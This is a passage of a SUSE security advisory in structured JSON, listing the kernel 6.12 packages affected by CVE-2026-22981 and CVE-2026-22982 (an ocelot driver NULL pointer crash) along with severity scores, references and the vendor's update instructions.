"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22981"
},
{
"cve": "CVE-2026-22982",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22982"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: mscc: ocelot: Fix crash when adding interface under a lag\n\nCommit 15faa1f67ab4 (\"lan966x: Fix crash when adding interface under a lag\")\nfixed a similar issue in the lan966x driver caused by a NULL pointer dereference.\nThe ocelot_set_aggr_pgids() function in the ocelot driver has similar logic\nand is susceptible to the same crash.\n\nThis issue specifically affects the ocelot_vsc7514.c frontend, which leaves\nunused ports as NULL pointers. The felix_vsc9959.c frontend is unaffected as\nit uses the DSA framework which registers all ports.\n\nFix this by checking if the port pointer is valid before accessing it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22982",
"url": "https://www.suse.com/security/cve/CVE-2026-22982"
},
{
"category": "external",
"summary": "SUSE Bug 1257179 for CVE-2026-22982",
"url": "https://bugzilla.suse.com/1257179"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
